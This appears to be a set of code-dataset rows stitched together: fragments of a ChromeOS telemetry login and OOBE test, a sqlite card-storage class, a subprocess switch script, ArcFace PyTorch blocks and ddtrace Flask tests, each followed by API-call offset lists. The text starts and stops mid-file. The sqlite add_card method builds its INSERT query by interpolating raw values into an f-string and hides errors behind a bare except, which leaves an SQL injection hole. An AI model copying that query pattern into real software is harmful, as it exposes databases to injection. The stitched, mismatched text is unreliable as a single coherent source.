lambda: extension.EvaluateJavaScript('window.__login_status'), 10)
def testCryptohomeMounted(self):
"""Verifies cryptohome mount status for regular and guest user and when
logged out"""
with self._CreateBrowser() as b:
self.assertEquals(1, len(b.tabs))
self.assertTrue(b.tabs[0].url)
self.assertTrue(self._IsCryptohomeMounted())
chronos_fs = self._cri.FilesystemMountedAt('/home/chronos/user')
self.assertTrue(chronos_fs)
if self._is_guest:
self.assertEquals(chronos_fs, 'guestfs')
else:
home, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome-path',
'user', self._username])
self.assertEquals(self._cri.FilesystemMountedAt(home.rstrip()),
chronos_fs)
self.assertFalse(self._IsCryptohomeMounted())
self.assertEquals(self._cri.FilesystemMountedAt('/home/chronos/user'),
'/dev/mapper/encstateful')
def testLoginStatus(self):
"""Tests autotestPrivate.loginStatus"""
with self._CreateBrowser(autotest_ext=True) as b:
login_status = self._GetLoginStatus(b)
self.assertEquals(type(login_status), dict)
self.assertEquals(not self._is_guest, login_status['isRegularUser'])
self.assertEquals(self._is_guest, login_status['isGuest'])
self.assertEquals(login_status['email'], self._username)
self.assertFalse(login_status['isScreenLocked'])
def _IsScreenLocked(self, browser):
return self._GetLoginStatus(browser)['isScreenLocked']
def _LockScreen(self, browser):
self.assertFalse(self._IsScreenLocked(browser))
extension = self._GetAutotestExtension(browser)
self.assertTrue(extension.EvaluateJavaScript(
"typeof chrome.autotestPrivate.lockScreen == 'function'"))
logging.info('Locking screen')
extension.ExecuteJavaScript('chrome.autotestPrivate.lockScreen();')
logging.info('Waiting for the lock screen')
def ScreenLocked():
return (browser.oobe and
browser.oobe.EvaluateJavaScript("typeof Oobe == 'function'") and
browser.oobe.EvaluateJavaScript(
"typeof Oobe.authenticateForTesting == 'function'"))
util.WaitFor(ScreenLocked, 10)
self.assertTrue(self._IsScreenLocked(browser))
def _AttemptUnlockBadPassword(self, browser):
logging.info('Trying a bad password')
def ErrorBubbleVisible():
return not browser.oobe.EvaluateJavaScript('''
document.getElementById('bubble').hidden
''')
self.assertFalse(ErrorBubbleVisible())
browser.oobe.ExecuteJavaScript('''
Oobe.authenticateForTesting('%s', 'bad');
''' % self._username)
util.WaitFor(ErrorBubbleVisible, 10)
self.assertTrue(self._IsScreenLocked(browser))
def _UnlockScreen(self, browser):
logging.info('Unlocking')
browser.oobe.ExecuteJavaScript('''
Oobe.authenticateForTesting('%s', '%s');
''' % (self._username, self._password))
util.WaitFor(lambda: not browser.oobe, 10)
self.assertFalse(self._IsScreenLocked(browser))
def testScreenLock(self):
"""Tests autotestPrivate.screenLock"""
with self._CreateBrowser(autotest_ext=True) as browser:
self._LockScreen(browser)
self._AttemptUnlockBadPassword(browser)
self._UnlockScreen(browser)
def testLogout(self):
"""Tests autotestPrivate.logout"""
with self._CreateBrowser(autotest_ext=True) as b:
extension = self._GetAutotestExtension(b)
try:
extension.ExecuteJavaScript('chrome.autotestPrivate.logout();')
except (exceptions.BrowserConnectionGoneException,
exceptions.BrowserGoneException):
pass
util.WaitFor(lambda: not self._IsCryptohomeMounted(), 20)
def _SwitchRegion(self, region):
self._cri.RunCmdOnDevice(['stop', 'ui'])
# Change VPD (requires RW-enabled firmware).
# To save time, region and initial_timezone are not set.
vpd = {'initial_locale': region.language_code,
'keyboard_layout': region.keyboard}
for (key, value) in vpd.items():
self._cri.RunCmdOnDevice(['vpd', '-s', '"%s"="%s"' % (key, value)])
# Remove cached files to clear initial locale info and force regeneration.
self._cri.RunCmdOnDevice(['rm', '/home/chronos/Local\ State'])
self._cri.RunCmdOnDevice(['rm', '/home/chronos/.oobe_completed'])
self._cri.RunCmdOnDevice(['dump_vpd_log', '--force'])
self._cri.RunCmdOnDevice(['start', 'ui'])
def _OobeHasOption(self, browser, selectId, value):
hasOptionJs = '''
// Check that the option is present, and selected if it is the default.
(function hasOption(selectId, value, isDefault) {
var options = document.getElementById(selectId).options;
for (var i = 0; i < options.length; i++) {
if (options[i].value == value) {
// The option is present. Make sure it's selected if necessary.
return !isDefault || options.selectedIndex == i;
}
}
return false;
})("%s", "%s", %s);
'''
return browser.oobe.EvaluateJavaScript(
hasOptionJs % (selectId, value, 'true'))
def _ResolveLanguage(self, locale):
# If the locale matches a language but not the country, fall back to
# an existing locale. See ui/base/l10n/l10n_util.cc.
lang, _, region = map(str.lower, locale.partition('-'))
if not region:
return ""
# Map from other countries to a localized country
if lang == 'es' and region == 'es':
return 'es-419'
if lang == 'zh':
if region in ('hk', 'mo'):
return 'zh-TW'
return 'zh-CN'
if lang == 'en':
if region in ('au', 'ca', 'nz', 'za'):
return 'en-GB'
return 'en-US'
# No mapping found
return ""
def testOobeLocalization(self):
"""Tests different region configurations at OOBE"""
# Save the original device localization settings.
# To save time, only read initial_locale and keyboard_layout.
initial_region = self.Region('', '', '', '', '')
initial_region.language_code, _ = self._cri.RunCmdOnDevice(
['vpd', '-g', 'initial_locale'])
initial_region.keyboard, _ = self._cri.RunCmdOnDevice(
['vpd', '-g', 'keyboard_layout'])
for region in self.REGIONS_LIST:
self._SwitchRegion(region)
with self._CreateBrowser(auto_login=False) as browser:
# Ensure the dropdown lists have been created.
util.WaitFor(lambda: browser.oobe.EvaluateJavaScript(
'document.getElementById("language-select") != null'),
10)
# Find the language, or an acceptable fallback value.
languageFound = self._OobeHasOption(browser,
'language-select',
region.language_code)
if not languageFound:
fallback = self._ResolveLanguage(region.language_code)
self.assertTrue(fallback and
self._OobeHasOption(browser,
'language-select',
fallback))
# Find the keyboard layout.
self.assertTrue(self._OobeHasOption(
browser, 'keyboard-select', region.keyboard))
# Test is finished. Restore original region settings.
self._SwitchRegion(initial_region)
# The Region class and region list will be available in regions.py.
class Region(object):
def __init__(self, region_code, keyboard, time_zone, language_code,
keyboard_mechanical_layout, description=None, notes=None):
self.region_code = region_code
self.keyboard = keyboard
self.time_zone = time_zone
self.language_code = language_code
self.keyboard_mechanical_layout = keyboard_mechanical_layout
self.description = description or region_code
self.notes = notes
class Enum(frozenset):
def __getattr__(self, name):
if name in self:
return name
raise AttributeError
KeyboardMechanicalLayout = Enum(['ANSI', 'ISO', 'JIS', 'ABNT2'])
_KML = KeyboardMechanicalLayout
REGIONS_LIST = [
Region('au', 'xkb:us::eng', 'Australia/Sydney', 'en-AU', _KML.ANSI,
'Australia'),
Region('ca.ansi', 'xkb:us::eng', 'America/Toronto', 'en-CA', _KML.ANSI,
'Canada (US keyboard)',
'Canada with US (ANSI) keyboard; see http://goto/cros-canada'),
Region('ca.fr', 'xkb:ca::fra', 'America/Toronto', 'fr-CA', _KML.ISO,
'Canada (French keyboard)',
('Canadian French (ISO) keyboard. The most common configuration for '
'Canadian French SKUs. See http://goto/cros-canada')),
Region('ca.hybrid', 'xkb:ca:eng:eng', 'America/Toronto', 'en-CA', _KML.ISO,
'Canada (hybrid)',
('Canada with hybrid xkb:ca:eng:eng + xkb:ca::fra keyboard (ISO), '
'defaulting to English language and keyboard. Used only if there '
'needs to be a single SKU for all of Canada. See '
'http://goto/cros-canada')),
Region('ca.multix', 'xkb:ca:multix:fra', 'America/Toronto', 'fr-CA',
_KML.ISO, 'Canada (multilingual)',
("Canadian Multilingual keyboard; you probably don't want this. See "
"http://goto/cros-canada")),
Region('de', 'xkb:de::ger', 'Europe/Berlin', 'de', _KML.ISO, 'Germany'),
Region('fi', 'xkb:fi::fin', 'Europe/Helsinki', 'fi', _KML.ISO, 'Finland'),
Region('fr', 'xkb:fr::fra', 'Europe/Paris', 'fr', _KML.ISO, 'France'),
Region('gb', 'xkb:gb:extd:eng', 'Europe/London', 'en-GB', _KML.ISO, 'UK'),
Region('ie', 'xkb:gb:extd:eng', 'Europe/Dublin', 'en-GB', _KML.ISO,
'Ireland'),
Region('in', 'xkb:us::eng', 'Asia/Calcutta', 'en-US', _KML.ANSI, 'India'),
Region('my', 'xkb:us::eng', 'Asia/Kuala_Lumpur', 'ms', _KML.ANSI,
'Malaysia'),
Region('nl', 'xkb:us:intl:eng', 'Europe/Amsterdam', 'nl', _KML.ANSI,
'Netherlands'),
Region('nordic', 'xkb:se::swe', 'Europe/Stockholm', 'en-US', _KML.ISO,
'Nordics',
('Unified SKU for Sweden, Norway, and Denmark. This defaults '
'to Swedish keyboard layout, but starts with US English language '
'for neutrality. Use if there is a single combined SKU for Nordic '
'countries.')),
Region('se', 'xkb:se::swe', 'Europe/Stockholm', 'sv', _KML.ISO, 'Sweden',
("Use this if there separate SKUs for Nordic countries (Sweden, "
"Norway, and Denmark), or the device is only shipping to Sweden. "
"If there is a single unified SKU, use 'nordic' instead.")),
Region('sg', 'xkb:us::eng', 'Asia/Singapore', 'en-GB', _KML.ANSI,
'Singapore'),
Region('us', 'xkb:us::eng', 'America/Los_Angeles', 'en-US', _KML.ANSI,
'United States'),
]
| [
"json.loads",
"telemetry.core.browser_finder.FindBrowser",
"telemetry.core.backends.chrome.cros_interface.CrOSInterface",
"telemetry.core.util.WaitFor",
"os.path.dirname",
"telemetry.unittest.options_for_unittests.GetCopy",
"telemetry.core.extension_to_load.ExtensionToLoad",
"logging.info"
] | [((561, 592), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\n', (590, 592), False, 'from telemetry.unittest import options_for_unittests\n'), ((609, 685), 'telemetry.core.backends.chrome.cros_interface.CrOSInterface', 'cros_interface.CrOSInterface', (['options.cros_remote', 'options.cros_ssh_identity'], {}), '(options.cros_remote, options.cros_ssh_identity)\n', (637, 685), False, 'from telemetry.core.backends.chrome import cros_interface\n'), ((1179, 1205), 'json.loads', 'json.loads', (['cryptohomeJSON'], {}), '(cryptohomeJSON)\n', (1189, 1205), False, 'import json\n'), ((1495, 1526), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\n', (1524, 1526), False, 'from telemetry.unittest import options_for_unittests\n'), ((1880, 1915), 'telemetry.core.browser_finder.FindBrowser', 'browser_finder.FindBrowser', (['options'], {}), '(options)\n', (1906, 1915), False, 'from telemetry.core import browser_finder\n'), ((4602, 4632), 'logging.info', 'logging.info', (['"""Locking screen"""'], {}), "('Locking screen')\n", (4614, 4632), False, 'import logging\n'), ((4714, 4757), 'logging.info', 'logging.info', (['"""Waiting for the lock screen"""'], {}), "('Waiting for the lock screen')\n", (4726, 4757), False, 'import logging\n'), ((5010, 5040), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ScreenLocked', '(10)'], {}), '(ScreenLocked, 10)\n', (5022, 5040), False, 'from telemetry.core import util\n'), ((5149, 5186), 'logging.info', 'logging.info', (['"""Trying a bad password"""'], {}), "('Trying a bad password')\n", (5161, 5186), False, 'import logging\n'), ((5512, 5548), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ErrorBubbleVisible', '(10)'], {}), '(ErrorBubbleVisible, 10)\n', (5524, 5548), False, 'from telemetry.core import util\n'), ((5645, 5670), 'logging.info', 'logging.info', (['"""Unlocking"""'], {}), "('Unlocking')\n", (5657, 5670), False, 'import logging\n'), ((5815, 5858), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['(lambda : not browser.oobe)', '(10)'], {}), '(lambda : not browser.oobe, 10)\n', (5827, 5858), False, 'from telemetry.core import util\n'), ((1657, 1770), 'telemetry.core.extension_to_load.ExtensionToLoad', 'extension_to_load.ExtensionToLoad', ([], {'path': 'extension_path', 'browser_type': 'options.browser_type', 'is_component': '(True)'}), '(path=extension_path, browser_type=options\n .browser_type, is_component=True)\n', (1690, 1770), False, 'from telemetry.core import extension_to_load\n'), ((1585, 1610), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1600, 1610), False, 'import os\n')] |
import sqlite3
class Database:
def get_connection(self):
return sqlite3.connect("./db.sqlite")
def add_card(self, card_title, card_text, card_link_text, card_link_url):
con = self.get_connection()
cur = con.cursor()
create_table_query = "CREATE TABLE IF NOT EXISTS cards('card_title' VARCHAR," + \
" 'card_text' TEXT, 'card_link_text' VARCHAR, 'card_link_url' VARCHAR )"
insert_data_query = f"INSERT INTO " + \
f"cards VALUES ({card_title}, {card_text}, {card_link_text}, {card_link_url})"
try:
cur.execute(create_table_query)
cur.execute(insert_data_query)
con.commit()
except:
print("an error has been occurred !")
| [
"sqlite3.connect"
] | [((78, 108), 'sqlite3.connect', 'sqlite3.connect', (['"""./db.sqlite"""'], {}), "('./db.sqlite')\n", (93, 108), False, 'import sqlite3\n')] |
import subprocess
subprocess.Popen(['sh', '../Switches/Switch3_On.sh'])
| [
"subprocess.Popen"
] | [((18, 71), 'subprocess.Popen', 'subprocess.Popen', (["['sh', '../Switches/Switch3_On.sh']"], {}), "(['sh', '../Switches/Switch3_On.sh'])\n", (34, 71), False, 'import subprocess\n')] |
from collections import namedtuple
import torch
from torch.nn import (AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d,
Module, PReLU, ReLU, Sequential, Sigmoid)
# yapf: disable
"""
ArcFace implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch) # isort:skip # noqa
"""
# yapf: enable
class Flatten(Module):
"""Flatten Module."""
def forward(self, input):
return input.view(input.size(0), -1)
def l2_norm(input, axis=1):
"""l2 normalization.
Args:
input (torch.Tensor): The input tensor.
axis (int, optional): Specifies which axis of input to calculate the
norm across. Defaults to 1.
Returns:
Tensor: Tensor after L2 normalization per-instance.
"""
norm = torch.norm(input, 2, axis, True)
output = torch.div(input, norm)
return output
class Bottleneck(namedtuple('Block', ['in_channel', 'depth', 'stride'])):
"""A named tuple describing a ResNet block."""
def get_block(in_channel, depth, num_units, stride=2):
"""Get a single block config.
Args:
in_channel (int): Input channels.
depth (int): Output channels.
num_units (int): Number of unit modules.
stride (int, optional): Conv2d stride. Defaults to 2.
Returns:
list: A list of unit modules' config.
"""
return [Bottleneck(in_channel, depth, stride)
] + [Bottleneck(depth, depth, 1) for i in range(num_units - 1)]
def get_blocks(num_layers):
"""Get block configs of backbone.
Args:
num_layers (int): Number of ConvBlock layers in backbone.
Raises:
ValueError: `num_layers` must be one of [50, 100, 152].
Returns:
list: A list of block configs.
"""
if num_layers == 50:
blocks = [
get_block(in_channel=64, depth=64, num_units=3),
get_block(in_channel=64, depth=128, num_units=4),
get_block(in_channel=128, depth=256, num_units=14),
get_block(in_channel=256, depth=512, num_units=3)
]
elif num_layers == 100:
blocks = [
get_block(in_channel=64, depth=64, num_units=3),
get_block(in_channel=64, depth=128, num_units=13),
get_block(in_channel=128, depth=256, num_units=30),
get_block(in_channel=256, depth=512, num_units=3)
]
elif num_layers == 152:
blocks = [
get_block(in_channel=64, depth=64, num_units=3),
get_block(in_channel=64, depth=128, num_units=8),
get_block(in_channel=128, depth=256, num_units=36),
get_block(in_channel=256, depth=512, num_units=3)
]
else:
raise ValueError(
'Invalid number of layers: {}. Must be one of [50, 100, 152]'.
format(num_layers))
return blocks
class SEModule(Module):
"""Squeeze-and-Excitation Modules.
Args:
channels (int): Input channels.
reduction (int): Intermediate channels reduction ratio.
"""
def __init__(self, channels, reduction):
super(SEModule, self).__init__()
self.avg_pool = AdaptiveAvgPool2d(1)
self.fc1 = Conv2d(
channels,
channels // reduction,
kernel_size=1,
padding=0,
bias=False)
self.relu = ReLU(inplace=True)
self.fc2 = Conv2d(
channels // reduction,
channels,
kernel_size=1,
padding=0,
bias=False)
self.sigmoid = Sigmoid()
def forward(self, x):
"""Forward Function."""
module_input = x
x = self.avg_pool(x)
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
x = self.sigmoid(x)
return module_input * x
class bottleneck_IR(Module):
"""Intermediate Resblock of bottleneck.
Args:
in_channel (int): Input channels.
depth (int): Output channels.
stride (int): Conv2d stride.
"""
def __init__(self, in_channel, depth, stride):
"""Intermediate Resblock of bottleneck.
Args:
in_channel (int): Input channels.
depth (int): Output channels.
stride (int): Conv2d stride.
"""
super(bottleneck_IR, self).__init__()
if in_channel == depth:
self.shortcut_layer = MaxPool2d(1, stride)
else:
self.shortcut_layer = Sequential(
Conv2d(in_channel, depth, (1, 1), stride, bias=False),
BatchNorm2d(depth))
self.res_layer = Sequential(
BatchNorm2d(in_channel),
Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),
PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False),
BatchNorm2d(depth))
def forward(self, x):
"""Forward function."""
shortcut = self.shortcut_layer(x)
res = self.res_layer(x)
return res + shortcut
class bottleneck_IR_SE(Module):
"""Intermediate Resblock of bottleneck with SEModule.
Args:
in_channel (int): Input channels.
depth (int): Output channels.
stride (int): Conv2d stride.
"""
def __init__(self, in_channel, depth, stride):
super(bottleneck_IR_SE, self).__init__()
if in_channel == depth:
self.shortcut_layer = MaxPool2d(1, stride)
else:
self.shortcut_layer = Sequential(
Conv2d(in_channel, depth, (1, 1), stride, bias=False),
BatchNorm2d(depth))
self.res_layer = Sequential(
BatchNorm2d(in_channel),
Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),
PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False),
BatchNorm2d(depth), SEModule(depth, 16))
def forward(self, x):
"""Forward function."""
shortcut = self.shortcut_layer(x)
res = self.res_layer(x)
return res + shortcut
| [
"torch.nn.Sigmoid",
"torch.nn.ReLU",
"collections.namedtuple",
"torch.nn.BatchNorm2d",
"torch.nn.Conv2d",
"torch.nn.PReLU",
"torch.norm",
"torch.nn.MaxPool2d",
"torch.nn.AdaptiveAvgPool2d",
"torch.div"
] | [((890, 944), 'collections.namedtuple', 'namedtuple', (['"""Block"""', "['in_channel', 'depth', 'stride']"], {}), "('Block', ['in_channel', 'depth', 'stride'])\n", (900, 944), False, 'from collections import namedtuple\n'), ((784, 816), 'torch.norm', 'torch.norm', (['input', '(2)', 'axis', '(True)'], {}), '(input, 2, axis, True)\n', (794, 816), False, 'import torch\n'), ((830, 852), 'torch.div', 'torch.div', (['input', 'norm'], {}), '(input, norm)\n', (839, 852), False, 'import torch\n'), ((3144, 3164), 'torch.nn.AdaptiveAvgPool2d', 'AdaptiveAvgPool2d', (['(1)'], {}), '(1)\n', (3161, 3164), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3184, 3261), 'torch.nn.Conv2d', 'Conv2d', (['channels', '(channels // reduction)'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels, channels // reduction, kernel_size=1, padding=0, bias=False)\n', (3190, 3261), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3343, 3361), 'torch.nn.ReLU', 'ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (3347, 3361), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3381, 3458), 'torch.nn.Conv2d', 'Conv2d', (['(channels // reduction)', 'channels'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels // reduction, channels, kernel_size=1, padding=0, bias=False)\n', (3387, 3458), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3543, 3552), 'torch.nn.Sigmoid', 'Sigmoid', ([], {}), '()\n', (3550, 3552), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4378, 4398), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\n', (4387, 4398), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4615, 4638), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\n', (4626, 4638), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4652, 4708), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\n', (4658, 4708), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4722, 4734), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\n', (4727, 4734), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4736, 4787), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\n', (4742, 4787), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4801, 4819), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (4812, 4819), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5379, 5399), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\n', (5388, 5399), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5616, 5639), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\n', (5627, 5639), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5653, 5709), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\n', (5659, 5709), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5723, 5735), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\n', (5728, 5735), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5737, 5788), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\n', (5743, 5788), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5802, 5820), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (5813, 5820), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4475, 4528), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\n', (4481, 4528), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4546, 4564), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (4557, 4564), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5476, 5529), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\n', (5482, 5529), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5547, 5565), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (5558, 5565), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n')] |
# -*- coding: utf-8 -*-
from ddtrace.compat import PY2
from ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY
from ddtrace.contrib.flask.patch import flask_version
from ddtrace.ext import http
from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID, HTTP_HEADER_PARENT_ID
from flask import abort
from . import BaseFlaskTestCase
from ...utils import assert_span_http_status_code
base_exception_name = 'builtins.Exception'
if PY2:
base_exception_name = 'exceptions.Exception'
class FlaskRequestTestCase(BaseFlaskTestCase):
def test_request(self):
"""
When making a request
We create the expected spans
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
res = self.client.get('/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
spans = self.get_spans()
self.assertEqual(len(spans), 8)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.index',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET /')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 0)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('flask.endpoint'), 'index')
self.assertEqual(req_span.get_tag('flask.url_rule'), '/')
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/')
assert_span_http_status_code(req_span, 200)
assert http.QUERY_STRING not in req_span.meta
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index')
self.assertEqual(handler_span.resource, '/')
self.assertEqual(req_span.error, 0)
def test_request_query_string_trace(self):
"""Make sure when making a request that we create the expected spans and capture the query string."""
@self.app.route('/')
def index():
return 'Hello Flask', 200
with self.override_http_config('flask', dict(trace_query_string=True)):
self.client.get('/?foo=bar&baz=biz')
spans = self.get_spans()
# Request tags
assert spans[0].get_tag(http.QUERY_STRING) == 'foo=bar&baz=biz'
def test_analytics_global_on_integration_default(self):
"""
When making a request
When an integration trace search is not event sample rate is not set and globally trace search is enabled
We expect the root span to have the appropriate tag
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
with self.override_global_config(dict(analytics_enabled=True)):
res = self.client.get('/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
root = self.get_root_span()
root.assert_matches(
name='flask.request',
metrics={
ANALYTICS_SAMPLE_RATE_KEY: 1.0,
},
)
for span in self.spans:
if span == root:
continue
self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
def test_analytics_global_on_integration_on(self):
"""
When making a request
When an integration trace search is enabled and sample rate is set and globally trace search is enabled
We expect the root span to have the appropriate tag
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
with self.override_global_config(dict(analytics_enabled=True)):
with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)):
res = self.client.get('/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
root = self.get_root_span()
root.assert_matches(
name='flask.request',
metrics={
ANALYTICS_SAMPLE_RATE_KEY: 0.5,
},
)
for span in self.spans:
if span == root:
continue
self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
def test_analytics_global_off_integration_default(self):
"""
When making a request
When an integration trace search is not set and sample rate is set and globally trace search is disabled
We expect the root span to not include tag
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
with self.override_global_config(dict(analytics_enabled=False)):
res = self.client.get('/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
root = self.get_root_span()
self.assertIsNone(root.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
for span in self.spans:
if span == root:
continue
self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
def test_analytics_global_off_integration_on(self):
"""
When making a request
When an integration trace search is enabled and sample rate is set and globally trace search is disabled
We expect the root span to have the appropriate tag
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
with self.override_global_config(dict(analytics_enabled=False)):
with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)):
res = self.client.get('/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
root = self.get_root_span()
root.assert_matches(
name='flask.request',
metrics={
ANALYTICS_SAMPLE_RATE_KEY: 0.5,
},
)
for span in self.spans:
if span == root:
continue
self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))
def test_distributed_tracing(self):
"""
When making a request
When distributed tracing headers are present
We create the expected spans
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
# Default: distributed tracing enabled
res = self.client.get('/', headers={
HTTP_HEADER_PARENT_ID: '12345',
HTTP_HEADER_TRACE_ID: '678910',
})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
